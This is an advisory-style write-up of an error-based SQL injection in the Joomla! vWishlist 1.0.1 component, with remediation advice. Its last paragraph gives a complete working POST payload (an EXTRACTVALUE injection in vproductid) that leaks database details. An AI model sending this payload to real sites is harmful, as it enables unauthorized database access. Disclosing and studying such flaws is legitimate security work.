Joomla vWishlist 1.0.1 SQL Injection via vproductid Parameter

An authenticated attacker sends a POST request to the Joomla! instance with `option=com_vwishlist&task=wishlist` and injects SQL payloads into the `vproductid` or `userid` parameters. The payload shown in the exploit uses URL-encoded SQL (e.g., `AND EXTRACTVALUE(...)`) to extract database version and database name via error-based SQL injection. The server responds with a 500 error and an XPATH syntax error message that leaks the extracted data.

The Joomla! vWishlist 1.0.1 component fails to sanitize the `vproductid` and `userid` POST parameters before using them in database queries. The exploit targets the `com_vwishlist` component's `wishlist` task, where these parameters are passed unsanitized.

No patch is included in the bundle. The advisory does not provide a fix; the only remediation is to upgrade to a patched version of the vWishlist component if one exists, or to apply input validation and parameterized queries to the `vproductid` and `userid` parameters in the component's code.

Send a POST request to `http://TARGET/[PATH]/` with body `option=com_vwishlist&task=wishlist&wishval=1&userid=711&numofQuantity=1&wishQuantshw=1&wishPriceshw=1&wishDatetimeshw=1&vproductid=48%20%41%4e%44%20%45%58%54%52%41%43%54%56%41%4c%55%45%28%32%32,%43%4f%4e%43%41%54%28%30%78%35%63%2c%76%65%72%73%69%6f%6e%28%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%31%3d%31%2c%31%29%29%29,%64%61%74%61%62%61%73%65%28%29%29%29%2d%2d%20%58` (URL-decoded: `48 AND EXTRACTVALUE(22,CONCAT(0x5c,version(),(SELECT (ELT(1=1,1))),database()))-- X`). The server returns a 500 error with an XPATH syntax error message containing the database version and name.